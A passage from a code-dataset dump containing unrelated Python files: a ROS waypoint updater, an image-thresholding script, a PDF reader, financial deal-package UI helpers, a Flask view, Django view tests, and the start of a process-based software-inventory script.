`/vehicle/traffic_lights` message. You can use this message to build this node\nas well as to verify your TL classifier.\nTODO (for Yousuf and Aaron): Stopline location for each traffic light.\n'''\n\nLOOKAHEAD_WPTS = 200 # Number of waypoints we will publish. You can change this number\nACC_MIN = -0.8\nDIST_MIN = 1\n\n\nclass WaypointUpdater(object):\n def __init__(self):\n rospy.init_node('waypoint_updater')\n #rospy.logwarn(\"debugging: wapoint_updater.py - initialization - line38\")\n rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n rospy.Subscriber('/base_waypoints', Lane, self.wpts_cb)\n\n # TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below\n rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb)\n rospy.Subscriber('/current_velocity', TwistStamped, self.curr_vel_cb, queue_size=1)\n\n self.final_wpts_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)\n self.speed_limit = rospy.get_param('waypoint_loader/velocity', 40) / 3.6 # Convert kph to mps\n\n # TODO: Add other member variables you need below\n self.wpt_tree = None\n self.wpt_speeds = []\n self.tf_listener = tf.TransformListener()\n self.wpt_redlight = None\n self.next_wpt = -1\n self.speed_curr = None\n self.speed_target_traj = 0.0\n self.speed_hysteresis_traj = hysteresis(2.0, 2.1, 0.0)\n self.pose_curr = None #Current pose\n self.wpts_base = None #Base waypoints\n\n rospy.spin()\n\n\n def pose_cb(self, msg):\n # TODO: Implement\n self.pose_curr = msg\n #rospy.logwarn(\"waypoint_updater:pose_cb:self.pose_curr %s\", self.pose_curr)\n\n if ((self.wpts_base == None) or (self.wpt_redlight == None) or (self.speed_curr == None)):\n #rospy.logwarn(\"debugging: wapoint_updater.py - pose_cb - line70\")\n return # Do nothing unless all msgs received\n #rospy.logwarn(\"[debugging: wapoint_updater.py - pose_cb - line72]\")\n # Find the nearest waypoint to the current position\n next_wpt = self.get_nearest_wpt(self.pose_curr.pose)\n\n # The next waypoint must be ahed of the current position\n transformed_wpt = self.trans_fromcar_tomap(self.wpts_base.waypoints[next_wpt].pose)\n\n if ((transformed_wpt != None) and (transformed_wpt.pose.position.x <= 0.0)):\n next_wpt += 1\n\n num_wpts = len(self.wpts_base.waypoints)\n #rospy.logwarn(\"waypoint_updater.py - pose_cb: num_wpts=%f\", num_wpts)\n\n if next_wpt >= num_wpts:\n next_wpt -= num_wpts\n\n #rospy.logwarn(\"debugging: wapoint_updater.py - pose_cb - line88\")\n self.calc_traj(next_wpt) # Calculate the trajectory\n next_wps = [None] * LOOKAHEAD_WPTS # Construct a set of following waypoints\n\n for _wp, wp in enumerate(range(next_wpt, next_wpt + LOOKAHEAD_WPTS)):\n wp_index = wp if (wp < num_wpts) else (wp - num_wpts)\n next_wps[_wp] = self.wpts_base.waypoints[wp_index]\n self.set_wpt_vel(next_wps, _wp, min(self.wpt_speeds[wp_index], self.get_traj_speed_at_wpt(_wp)))\n\n # Construct final_waypoints message\n lane = Lane()\n lane.waypoints = next_wps\n lane.header.frame_id = self.wpts_base.header.frame_id\n lane.header.stamp = rospy.Time(0)\n\n #rospy.loginfo(\"[debugging wapoint_updater.py - pose_cb - line103: final_waypoints published\")\n self.final_wpts_pub.publish(lane)\n \n #self.wpts_base = msg\n #pass\n\n\n def wpts_cb(self, msg):\n # TODO: Implement\n if self.wpts_base != None:\n return\n\n self.wpts_base = msg\n\n for idx_wp in range(len(self.wpts_base.waypoints)):\n self.wpts_base.waypoints[idx_wp].pose.header.frame_id = self.wpts_base.header.frame_id\n self.wpt_speeds.append(self.speed_limit)\n\n self.wpt_tree = kdtree([(wpt.pose.pose.position.x, wpt.pose.pose.position.y) for wpt in self.wpts_base.waypoints], 2)\n #pass\n\n\n def traffic_cb(self, msg):\n # TODO: Callback for /traffic_waypoint message. Implement\n self.wpt_redlight = msg.data\n #pass\n\n\n def obstacle_cb(self, msg):\n # TODO: Callback for /obstacle_waypoint message. We will implement it later\n pass\n\n\n ### Added custom functions\n def curr_vel_cb(self, msg):# Get current velocity\n self.speed_curr = msg.twist.linear.x\n \n def get_nearest_wpt(self, pose):# Identify the nearest path waypoint to the position\n if self.wpt_tree == None:\n return None\n\n return self.wpt_tree.closest((pose.position.x, pose.position.y))[0]\n \n\n def trans_fromcar_tomap(self, pose_curr):# Transform the car position to the map coordinate\n try:\n self.tf_listener.waitForTransform(\"base_link\", \"world\", rospy.Time(0), rospy.Duration(0.02))\n transformed_pose_curr = self.tf_listener.transformPose(\"base_link\", pose_curr)\n except (tf.Exception, tf.LookupException, tf.ConnectivityException):\n try:\n self.tf_listener.waitForTransform(\"base_link\", \"world\", rospy.Time(0), rospy.Duration(1.0))\n transformed_pose_curr = self.tf_listener.tranformPose(\"base_link\", pose_curr)\n except (tf.Exception, tf.LookupException, tf.ConnectivityException):\n transformed_pose_curr = None\n rospy.logwarn(\"Failed to transform pose\")\n\n return transformed_pose_curr\n\n\n def calc_traj(self, next_wpt):# Calculate a trajectory\n speed_max = self.wpt_speeds[next_wpt]\n #rospy.logwarn(\"[wapoint_updater.py - calc_trajectory - line168] self.wpt_redlight = %f\", self.wpt_redlight)\n\n if self.wpt_redlight > 0:\n #rospy.logwarn(\"wapoint_updater.py - calc_trajectory - line171] self.wpt_redlight\")\n dist_stop = self.distance(self.wpts_base.waypoints, next_wpt, self.wpt_redlight)\n if dist_stop > DIST_MIN:\n dist_stop -= DIST_MIN\n speed_target = min(self.speed_curr, min(speed_max, math.sqrt(-2.0*ACC_MIN*dist_stop)))\n else:\n #rospy.logwarn(\"debugging: wapoint_updater.py - calc_trajectory - line177\")\n speed_target = speed_max\n \n #rospy.logwarn(\"waypoint_updater.py - calc_trajectory: speed_target=%f\", speed_target)\n\n self.speed_target_traj = self.speed_hysteresis_traj.output(speed_target)\n\n \n def get_traj_speed_at_wpt(self, wpt):# Get the expected speed at a waypoint\n return self.speed_target_traj\n\n\n def get_wpt_vel(self, wpt):\n return wpt.twist.twist.linear.x\n\n\n def set_wpt_vel(self, wpts, wpt, velocity):\n wpts[wpt].twist.twist.linear.x = velocity\n\n\n def distance(self, wpts, wp1, wp2):\n dist = 0\n dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)\n for i in range(wp1, wp2+1):\n dist += dl(wpts[wp1].pose.pose.position, wpts[i].pose.pose.position)\n wp1 = i\n return dist\n\n\nif __name__ == '__main__':\n try:\n WaypointUpdater()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start waypoint updater node.')","sub_path":"ros/src/waypoint_updater/waypoint_updater.py","file_name":"waypoint_updater.py","file_ext":"py","file_size_in_byte":7965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"590658680","text":"import os\nimport cv2\nimport random\nimport numpy as np\nfrom PIL import Image\n\ndef FileVal(path):\n listdir = os.listdir(path)\n listone = os.path.join(path, listdir[3])\n listtwo = os.listdir(listone)\n listthree = os.path.join(listone, listtwo[0])\n listfour = os.listdir(listthree)##索引到训练集train里面文件\n\n list = os.path.join(listthree, listfour[2])\n raw_file = open(list,'r')\n raw_data = raw_file.readlines()\n train_label = []\n for i in raw_data:\n line = i.strip().split('\\n')\n train_label.append(line[0] + '.jpg')\n a = len(train_label)\n num = random.sample(train_label, 230)#随机的对指定的图像进行像素操作\n return num\n\n\ndef ChangePixel(path):\n listdir01 = os.listdir(path)\n listdir02 = os.path.join(path, listdir01[0])\n image = os.listdir(listdir02)\n num = FileVal(path)\n count = 0\n for p in num:\n index = os.path.join(listdir02, p)\n img = cv2.imread(index)\n data = np.array(img)\n #改变B通道的像素\n for i in range(data[:,:,0].shape[0]):\n for j in range(data[:,:,0].shape[1]):\n if data[:,:,0][i][j] > 155:\n data[:,:,0][i][j] = 255\n else:\n data[:,:,0][i][j] = 0\n #改变G通道的像素\n for i in range(data[:,:,1].shape[0]):\n for j in range(data[:,:,1].shape[1]):\n if data[:,:,1][i][j] > 155:\n data[:,:,1][i][j] = 255\n else:\n data[:,:,1][i][j] = 0\n #改变R通道的像素\n for i in range(data[:,:,2].shape[0]):\n for j in range(data[:,:,2].shape[1]):\n if data[:,:,2][i][j] > 155:\n data[:,:,2][i][j] = 255\n else:\n data[:,:,2][i][j] = 0\n\n figure = Image.fromarray(data)\n figure.save(index)\n # figure.save(p)\n count = count + 1\n return count\n\nif __name__ == '__main__':\n #path = '/home/a401/Documents/SSD-COCO/VOCdevkit/VOC2007'\n path = '/home/a401/Documents/SSD-COCO/VOCdevkit/VOC2012'\n # a = FileVal(path)\n # print(a)\n count = ChangePixel(path)\n print(count)","sub_path":"Modify_Pixel.py","file_name":"Modify_Pixel.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"114936281","text":"import PyPDF2\r\n\r\na=PyPDF2.PdfFileReader(input(\"Give your pdf name with extention properly : \"))\r\n# print(a.documentInfo)\r\npages = a.numPages\r\nprint(\"No of pages: \",pages)\r\n\r\ndef speak(str):\r\n from win32com.client import Dispatch\r\n speak=Dispatch(\"sapi.spvoice\")\r\n speak.speak(str)\r\n\r\nfor num in range(pages):\r\n page = a.getPage(num)\r\n text = page.extractText()\r\n # print(text)\r\n speak(text)\r\n","sub_path":"25.AudioBookUserinputProject.py","file_name":"25.AudioBookUserinputProject.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30146969","text":"import acm\nfrom DealPackageUtil import DealPackageException, FormatException, UnDecorate\nfrom DealCommands import SwitchLegsCommand\n\nclass HelperInterface(object):\n CreateFunc = None\n DEFAULT_DEFINITION = ''\n def Decorate(self, subject, gui): raise NotImplementedError\n def Open(self, subject, gui): raise NotImplementedError\n def Save(self, subject, config): raise NotImplementedError\n def DefinitionDisplayName(self, subject): raise NotImplementedError\n def MultiTradingEnabled(self, subject): raise NotImplementedError\n def Name(self, subject): raise NotImplementedError\n def DeleteSubject(self, subject, deleteTrades, trades): raise NotImplementedError\n def DeleteTrade(self, subject, trade): raise NotImplementedError\n def Trades(self, subject): raise NotImplementedError\n def IsDeletedMsg(self, subject): raise NotImplementedError\n def Originator(self, subject): raise NotImplementedError\n def Definition(self, subject): raise NotImplementedError\n def Commands(self, subject): return {}\n \n def CreateSubject(self, definition, gui, *optArgs):\n subject = None\n try:\n subject = self.CreateFunc(definition, gui, *optArgs)\n except Exception as e:\n acm.LogAll('Could not create subject from definition \"%s\": %s' % (definition, e))\n msg = FormatException(e)\n gui.GenericMessage(msg)\n subject = self.CreateFunc(self.DEFAULT_DEFINITION, gui, *optArgs)\n return subject \n\n\nclass DealPackageHelper(HelperInterface):\n CreateFunc = acm.DealPackage.NewAsDecorator\n DEFAULT_DEFINITION = 'Free Form'\n\n def Decorate(self, subject, gui):\n decorator = acm.FBusinessLogicDecorator.WrapObject(UnDecorate(subject), gui)\n return decorator\n\n def Open(self, obj, gui, preserveObject=True):\n obj = UnDecorate( obj ) # to enssure we have the right GUI on the decorator\n fromInsPackage = False\n if obj.IsKindOf(acm.FTrade):\n package = obj.DealPackage()\n elif obj.IsKindOf(acm.FInstrumentPackage):\n package = acm.DealPackage.NewAsDecoratorFromInstrumentPackage(obj, gui)\n fromInsPackage = True\n else:\n package = self.Decorate(obj, gui)\n if not package:\n raise DealPackageException('Could not create deal package from ' + obj.ClassName() + ' ' + str(obj.Originator().StorageId()))\n if not fromInsPackage:\n if not self.Originator(package):\n if preserveObject:\n package = package.Copy()\n else:\n if preserveObject:\n package = package.Edit()\n else:\n package = self.Decorate(package.Originator(), gui).Edit()\n return package\n\n def Save(self, subject, config):\n if config is None:\n config = acm.FDealPackageSaveConfiguration()\n config.DealPackage('Save')\n config.InstrumentPackage('Save')\n self.__Validate(subject, config)\n return subject.Save(config)\n \n def __Validate(self, subject, config):\n aspect = \"DealPackage\"\n if config.DealPackage() == \"Exclude\":\n aspect = \"InstrumentPackage\"\n isValid = subject.IsValid(aspect)\n if not (isinstance(isValid, bool) and isValid == True):\n errorStr = 'Validation Errors:\\n'\n for error in isValid:\n errorStr = errorStr + '- ' + str(error) + '\\n'\n raise DealPackageException(errorStr)\n\n def DefinitionDisplayName(self, subject):\n return str(subject.DefinitionDisplayName())\n\n def MultiTradingEnabled(self, subject):\n return subject.GetAttribute('multiTradingEnabled')\n \n def Name(self, subject):\n return subject.Name()\n \n def ExcludeReference(self, reference):\n excludeRef = reference.IsKindOf(acm.FDealPackageTradeLink) or reference.IsKindOf(acm.FPayment) or reference.IsKindOf(acm.FMatchingTradeLink) or reference.IsKindOf(acm.FTradeAlias) or reference.IsKindOf(acm.FAdditionalInfo)\n return excludeRef\n\n def CheckTradeReferences(self, trade):\n referenced = False\n referencesStr = \"Trade \" + str(trade.OriginalOrSelf().Oid()) + \" cannot be deleted, references exists: \\n\"\n referencesIn = trade.OriginalOrSelf().ReferencesIn()\n if referencesIn.Size():\n for reference in referencesIn:\n if not self.ExcludeReference(reference):\n referencesStr += str(reference.RecordType()) + \" \" + str(reference.Oid()) + \"\\n\"\n referenced = True\n if referenced:\n raise DealPackageException(referencesStr)\n \n def DeleteSubject(self, subject, deleteTrades, trades): \n toOpen = None\n if subject.IsInfant():\n raise DealPackageException('Not possible to delete unsaved dealpackage')\n \n if deleteTrades:\n for trade in trades:\n self.CheckTradeReferences(trade)\n \n if subject.IsKindOf(acm.FDealPackage):\n multiTrading = subject.GetAttribute('multiTradingEnabled')\n original = subject.Original()\n insPackage = original.InstrumentPackage()\n if str(subject.Definition().CustomApplicationName()) == 'FX Option Pricer':\n original = original.Edit()\n original.Delete(True, deleteTrades)\n if not insPackage.IsDeleted() and multiTrading:\n toOpen = insPackage\n else:\n subject.Delete()\n return toOpen\n \n def DeleteTrade(self, subject, trade):\n self.CheckTradeReferences(trade)\n if trade.IsInfant():\n subject.DeleteTrade(trade)\n else:\n if not subject.Original():\n raise DealPackageException('Not possible to delete unsaved dealpackage')\n if not trade.Original():\n raise DealPackageException('Not possible to delete unsaved trade')\n original = subject.Original()\n if str(subject.Definition().CustomApplicationName()) == 'FX Option Pricer':\n original = original.Edit()\n if not original.DeleteTrade(trade.Original()):\n raise DealPackageException('Not possible to delete trade')\n\n def Trades(self, subject):\n return subject.Trades()\n \n def IsDeletedMsg(self, subject):\n return \"Deal Package '%s' has been deleted in the database.\" % self.Name(subject)\n \n def Originator(self, subject):\n if subject.Originator().Oid() > 0:\n return subject.Originator()\n elif subject.InstrumentPackage().Originator().Oid() > 0:\n return subject.InstrumentPackage().Originator()\n else:\n return None\n \n def Definition(self, subject):\n return subject.Definition()\n\n\nclass DealHelper(DealPackageHelper):\n CreateFunc = acm.Deal.NewAsDecorator\n DEFAULT_DEFINITION = 'Deal Default'\n\n def Open(self, obj, gui, preserveObject = True):\n obj = UnDecorate( obj ) # to enssure we have the right GUI on the decorator\n if obj.IsKindOf(acm.FTrade) or obj.IsKindOf(acm.FInstrument):\n package = acm.Deal.WrapAsDecorator(obj, gui, self.Definition(obj).Name())\n else:\n definition = self.Definition(obj)\n package = self.Decorate(obj, gui)\n if definition.BaseConfiguration().Name() == acm.FSymbol('FX Cash') or not self.Originator(package):\n if preserveObject:\n package = package.Copy()\n else:\n if preserveObject:\n package = package.Edit()\n else:\n package = acm.Deal.WrapAsDecorator(self.Originator(obj), gui, definition.Name()) \n if not package:\n raise DealPackageException('Could not create deal from ' + obj.ClassName() + ' ' + str(obj.Originator().StorageId()))\n return package\n \n def IsDeletedMsg(self, subject):\n return \"Instrument/Trade %s has been deleted in the database.\" % subject.Name()\n \n def Originator(self, subject):\n return self._OriginatorInsOrTrd(subject)\n \n def _OriginatorInsOrTrd(self, subject):\n instrumentOrTrade = None\n trade = self._Trade(subject)\n instrument = self._Instrument(subject)\n if trade and trade.Originator().Oid() > 0:\n instrumentOrTrade = trade.Originator()\n elif instrument and instrument.Originator().Oid() > 0:\n instrumentOrTrade = instrument.Originator()\n return instrumentOrTrade\n \n def _Trade(self, subject):\n return subject.Trades().First()\n \n def _Instrument(self, subject):\n return subject.Instruments().First()\n\n def Definition(self, subject):\n return acm.DealCapturing.CustomInstrumentDefinition(subject)\n \n def Commands(self, subject):\n return {'switchLegs':SwitchLegsCommand(dealPackage=subject)}\n \n def DeleteSubject(self, subject, deleteTrades, trades):\n trade = self._Trade(subject)\n ins = self._Instrument(subject) \n toOpen = None\n if trade.IsInfant() and ins.IsInfant():\n raise DealPackageException('Not possible to delete unsaved trade/instrument.')\n if trade.IsInfant():\n ins.Delete()\n else:\n self.CheckTradeReferences(trade)\n subject.Delete(True, True)\n if not ins.Originator().IsDeleted() and subject.GetAttribute('multiTradingEnabled'):\n toOpen = ins.Originator()\n return toOpen\n\n\nclass EditableObjectHelper(HelperInterface):\n CreateFunc = acm.EditableObject.New\n DEFAULT_DEFINITION = 'Default'\n\n def Decorate(self, subject, gui):\n definitionName = subject.DefinitionName()\n subject = UnDecorate(subject.Object())\n return acm.EditableObject().Wrap(definitionName, subject, gui)\n \n def CreateSubjectFromObject(self, obj, gui):\n return self.Decorate(UnDecorate(obj), gui)\n\n def Open(self, subjectToOpen, gui, perserveObject = True):\n subject = None\n if subjectToOpen.IsKindOf(acm.FEditableObject):\n editObject = subjectToOpen.Object()\n if editObject and editObject.StorageId() > 0:\n subjectToOpen = editObject\n else:\n subject = subjectToOpen\n if not subject:\n subjectToOpen = UnDecorate(subjectToOpen)\n definition = acm.EditableObjectDefinition.DefinitionFromClass(subjectToOpen.Class())\n subject = acm.EditableObject().Wrap(definition.Name(), subjectToOpen, gui)\n return subject\n\n def Save(self, subject, config):\n if config and config.DealPackage() == \"SaveNew\":\n return subject.SaveNew()\n else:\n return subject.Save()\n\n def DefinitionDisplayName(self, subject):\n return subject.DefinitionDisplayName()\n\n def MultiTradingEnabled(self, subject):\n return False\n \n def Name(self, subject): \n return subject.Object().Name()\n\n def DeleteSubject(self, subject, deleteTrades, trades):\n if subject.Object().IsInfant():\n raise DealPackageException('Not possible to delete unsaved editable object')\n else:\n subject.Object().Original().Delete()\n \n def Trades(self, subject):\n return []\n \n def Originator(self, subject):\n if subject.IsKindOf(acm.FEditableObject):\n subject = subject.Object()\n if subject.Originator().Oid() > 0:\n return subject.Originator()\n else:\n return None\n\n def IsDeletedMsg(self, subject):\n return \"Object has been deleted in the database.\"\n\n def Definition(self, subject):\n return acm.EditableObjectDefinition.DefinitionFromClass(UnDecorate(subject.Object()).Class())\n\ndef CreateControlCallback(delegate):\n\n def ParseControlTokenCallback(delegate, entry, xArg):\n try:\n if entry == 'fill':\n delegate.HandleFill(xArg)\n elif entry[0:6] == 'space(':\n size = int(entry.split('(')[1].split(')')[0].strip())\n delegate.HandleSpace(xArg, size)\n elif ')' in entry or ']' in entry or '}' in entry:\n delegate.HandleEndBox(xArg)\n else:\n traitName = entry\n extraArg = None\n if '(' in entry:\n raise Exception(\"'(' is not a valid delimiter for custom boxes.\")\n elif '{' in entry:\n traitName = entry.split('{')[0]\n extraArg = '{'\n elif '[' in entry:\n traitName = entry.split('[')[0]\n extraArg = '['\n delegate.HandleControl(xArg, traitName, extraArg)\n except Exception as e:\n msg = \"Failed to parse layout, name '%s' not recognized: '%s'\" % (entry, e)\n raise DealPackageException(msg)\n\n # Bind delegate to callback signature\n import functools\n partial = functools.partial(ParseControlTokenCallback, delegate)\n \n # Wrap in lambda since ACM does not understand partial functions\n return lambda *args, **kwargs: partial(*args, **kwargs)\n\nDEBUG = False\n\ndef Log(txt):\n if DEBUG:\n acm.Log(txt)\n\nclass ListAttributeWrapper(object):\n ''' Simplified access to column names, method chains, formatters etc '''\n\n def __init__(self, dealPackage, traitName):\n self._traitName = traitName\n self._dealPackage = dealPackage\n self._listColumnInfo = acm.FArray()\n self.CreateColumns()\n self._addNewItemRule = self.GetTraitMetaData('addNewItem')()\n\n def TraitName(self):\n return self._traitName\n\n def GetTraitMetaData(self, metaKey):\n return self._dealPackage.GetAttributeMetaData(self.TraitName(), metaKey)\n\n def AddNewItemLast(self):\n return 'Last' in self._addNewItemRule\n\n def ResortListOnChanged(self):\n return 'Sorted' in self._addNewItemRule\n\n def GetClassUiProperties(self):\n uiProperties = None\n try:\n domain = self.GetTraitMetaData('elementDomain')()\n uiProperties = 'Name' if domain == acm.FString else domain.UiProperties()\n if not uiProperties:\n uiProperties = 'Name'\n except Exception as e:\n msg = 'GetClassUiProperties failed: ' + str(e)\n Log(msg)\n return uiProperties\n\n def GetNameFromColumn(self, aClass, methodChain):\n colName = None\n colDef = acm.GetDefaultContext().GetExtension(acm.FColumnDefinition, aClass, methodChain)\n if colDef:\n colName = colDef.Value().At('ColumnName', None)\n return colName\n \n def GetNameFromMethod(self, aClass, methodChain):\n return acm.PropertyBinder().DisplayName(aClass, methodChain)\n \n def GetColumnName(self, domain, methodChain):\n columnName = self.GetNameFromColumn(domain, methodChain)\n if columnName is None:\n columnName = self.GetNameFromMethod(domain, methodChain)\n if columnName is None:\n columnName = methodChain\n return columnName\n\n def GetColumnFormatter(self, domain, methodChain):\n formatter = acm.PropertyBinder().FindFormatter(domain, methodChain, None)\n if not formatter:\n formatter = domain.DefaultFormatter() if domain else None\n return formatter\n\n def CreateColumnsFromUiProperties(self):\n try:\n domain = self.GetTraitMetaData('elementDomain')()\n for methodChain in self.GetClassUiProperties().split(' '):\n if methodChain:\n columnName = self.GetColumnName(domain, methodChain)\n formatter = self.GetColumnFormatter(domain, methodChain)\n self._listColumnInfo.Add((methodChain, columnName, formatter))\n except Exception as e:\n msg = 'CreateColumnsFromUiProperties failed: ' + str(e)\n Log(msg)\n return self._listColumnInfo\n\n def CreateArrayFromMetaDataDict(self, columns):\n try:\n for column in columns:\n columnName = column.get('label')\n methodChain = column.get('methodChain')\n formatter = column.get('formatter')\n if formatter:\n getStr = 'formats/' + formatter\n formatter = acm.Get(getStr)\n else:\n domain = self.GetTraitMetaData('elementDomain')()\n formatter = acm.PropertyBinder().FindFormatter(domain, methodChain, None)\n self._listColumnInfo.Add((methodChain, columnName, formatter))\n except Exception as e:\n msg = 'CreateArrayFromMetaDataDict failed: ' + str(e)\n Log(msg)\n return self._listColumnInfo\n\n def CreateColumns(self):\n columns = self.GetTraitMetaData(\"columns\")()\n if columns:\n columns = self.CreateArrayFromMetaDataDict(columns)\n if not columns:\n columns = self.CreateColumnsFromUiProperties()\n return columns\n\n def GetColumns(self):\n return self._listColumnInfo\n \n def GetColumnNames(self):\n return [columnName for _, columnName, _ in self.GetColumns()]\n \n def IsFObject(self, obj):\n return hasattr(obj, 'StringKey')\n\n def GetMethodValue(self, obj, methodChain):\n for method in methodChain.split('.'):\n if method:\n obj = getattr(obj, method)()\n return obj\n\n def GetValueFromMethod(self, obj, methodChain):\n try:\n if self.IsFObject(obj) and methodChain:\n obj = self.GetMethodValue(obj, methodChain)\n except Exception as e:\n msg = 'GetValueFromMethod failed: ' + str(e)\n Log(msg) \n \n return obj\n\n def GetFormattedValueFromMethod(self, val, column):\n methodChain = column.At(0)\n formatter = column.At(2)\n val = self.GetValueFromMethod(val, methodChain)\n if formatter:\n val = formatter.Format(val)\n else:\n if self.IsFObject(val):\n if hasattr(val, 'Name'):\n val = val.Name()\n elif hasattr(val, 'StringKey'):\n val = val.StringKey()\n else:\n val = str(val)\n return val\n \n def GetIconFromObject(self, obj):\n icon = None\n if self.IsFObject(obj):\n icon = obj.Icon()\n return icon\n","sub_path":"Extensions/Deal Package/FPythonCode/UxHelpers.py","file_name":"UxHelpers.py","file_ext":"py","file_size_in_byte":18675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"260092219","text":"\n\n\nclass entreprise(object):\n\n def __init__(self):\n self.bankrupt = False\n\n def open_branch(self):\n self.bankrupt = True\n if not self.bankrupt:\n print(\"Branch opened !\")\n\n\ntest = entreprise()\n\nprint(test.bankrupt)\n\nprint(entreprise().bankrupt)\n\ntest2 = entreprise()\ntest2.bankrupt = True\n\n#test.open_branch()\nprint(test.open_branch())\nprint(test2.bankrupt)\n","sub_path":"learning/self.py","file_name":"self.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"562134832","text":"from flask import Blueprint, render_template\nfrom service.auth import current_user\nimport requests\n\nfrom service.constants import STORIES_SERVICE_IP, STORIES_SERVICE_PORT\n\n\nhome = Blueprint('home', __name__)\n\n\ndef _strava_auth_url(config):\n return '127.0.0.1:5000'\n\n\n@home.route('/')\ndef index():\n if current_user is not None and hasattr(current_user, 'id'):\n stories = get_story_by_author_id(current_user.id)\n else:\n stories = []\n return render_template(\"index.html\", stories=stories, active_button=\"index\")\n\n\n\ndef get_story_by_author_id(author_id):\n url = 'http://' + STORIES_SERVICE_IP + ':' + STORIES_SERVICE_PORT + '/story_list/' + str(author_id)\n try:\n reply = request.get(url, timeout=1)\n story = json.loads(str(reply.data))\n if story[\"result\"] == 1:\n return story[\"story\"]\n else:\n return []\n except:\n return []\n\n","sub_path":"service/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"344985891","text":"from ..test_base import *\nfrom django.urls import resolve\nfrom application.presentation.insurance_cover.views.summary import *\nfrom application.tests.test_utils import get_signed_cookie_mock, get_session_user_mock\nfrom nanny.middleware import CustomAuthenticationHandler\n\nclass CustomResponse:\n record = None\n\n def __init__(self, record):\n self.record = record\n\n\ndef authenticate(application_id, *args, **kwargs):\n record = {\n 'application_id': application_id,\n 'email': 'test@informed.com'\n }\n return CustomResponse(record)\n\n\n@mock.patch.object(IdentityGatewayActions, \"read\", authenticate)\n@mock.patch.object(CustomAuthenticationHandler, \"get_signed_cookie\", get_signed_cookie_mock)\n@mock.patch.object(CustomAuthenticationHandler, \"get_session_user\", get_session_user_mock)\nclass SummaryTests(InsuranceCoverTests):\n\n def test_summary_url_resolves_to_page(self):\n \"\"\"\n Test to assert that the url for the 'summary' page can be resolved.\n \"\"\"\n found = resolve(reverse('insurance:Summary'))\n self.assertEqual(found.func.__name__, SummaryView.__name__)\n\n def test_can_render_summary_page(self):\n \"\"\"\n Test to assert that the summary page can be rendered\n \"\"\"\n with mock.patch.object(NannyGatewayActions, 'read') as nanny_api_get, \\\n mock.patch.object(NannyGatewayActions, 'list'):\n response = self.client.get(build_url('insurance:Summary', get={\n 'id': self.application_id\n }))\n\n self.assertEqual(response.status_code, 200)\n\n def test_can_post_to_summary_page(self):\n \"\"\"\n Test to assert that the summary page can be rendered\n \"\"\"\n with mock.patch.object(NannyGatewayActions, 'read') as nanny_api_get_app, \\\n mock.patch.object(NannyGatewayActions, 'put') as nanny_api_put_app:\n\n nanny_api_get_app.return_value.status_code = 200\n nanny_api_get_app.return_value.record = self.sample_app\n response = self.client.post(build_url('insurance:Summary', get={\n 'id': self.application_id\n }))\n\n self.assertEqual(response.status_code, 302)\n self.assertTrue('task-list' in response.url)\n","sub_path":"application/tests/test_insurance_cover/test_views/test_summary.py","file_name":"test_summary.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"158146008","text":"# -*- coding: utf-8 -*-\n\n\nimport commands\nimport re\nfrom shell_utils import executeCmdByShell,ExecuteException\nimport json\nimport io\nfrom log import CmdbLog\n\ndef get_user(path):\n cmd = 'ls -l %s' % path\n try:\n code, output = executeCmdByShell(cmd, raise_non_zero_exception=True)\n\n except ExecuteException as e:\n\n msg = e.message\n CmdbLog.add_debug(msg)\n return \"\",\"\"\n else:\n for item in output.splitlines():\n if 'total' not in item.lower():\n return item.split()[2], item.split()[3]\n return \"\", \"\"\n\n\n\n# def get_group(path):\n# cmd = 'ls -l %s' % path\n# try:\n# code, output = executeCmdByShell(cmd, raise_non_zero_exception=True)\n#\n# except ExecuteException as e:\n#\n# msg = e.message\n# CmdbLog.add_debug(msg)\n# return \"\",\"\"\n# else:\n# return output.splitlines()[-1].split()[3]\n\n\ndef getSoftwareLis(host_ip):\n # try:\n # with io.open('software.json', 'rb') as file:\n # filejson = json.load(file)\n #\n # except IOError:\n # print(\"ERROR,file not found!\")\n # else:\n filejson = [{\"softwareName\":\"Kafka\",\"softwareType\":\"ApplicationSystem\",\"existCmd\":\"ps -ef|grep kafkaServer\",\"exitKeyword\":\"kafka-clients\",\"installCmd\":\"ps -ef|grep kafka\",\"regex\":\"-Xloggc:(\\\\S+)/bin\"},\n\t{\"softwareName\":\"Mongodb\",\"softwareType\":\"DataBase\",\"existCmd\":\"ps -ef|grep mongodb\",\"exitKeyword\":\"/bin/mongod\",\"installCmd\":\"ps -ef|grep mongodb\",\"regex\":\"(\\\\S+)/bin\"},\n\t{\"softwareName\":\"Mysql\",\"softwareType\":\"DataBase\",\"existCmd\":\"ps -ef|grep mysqld\",\"exitKeyword\":\"/bin\",\"installCmd\":\"ps -ef|grep mysqld|grep basedir\",\"regex\":\"--basedir=(\\S+)\"},\n\t{\"softwareName\":\"Tomcat\",\"softwareType\":\"MiddleWare\",\"existCmd\":\"ps -ef|grep catalina\",\"exitKeyword\":\"catalina.home=\",\"installCmd\":\"ps -ef|grep tomcat\",\"regex\":\"-Dcatalina\\\\.home=(\\\\S+)\"},\n\t{\"softwareName\":\"Zookeeper\",\"softwareType\":\"ApplicationSystem\",\"existCmd\":\"ps -ef|grep Dzookeeper\",\"exitKeyword\":\"/bin\",\"installCmd\":\"ps -ef|grep 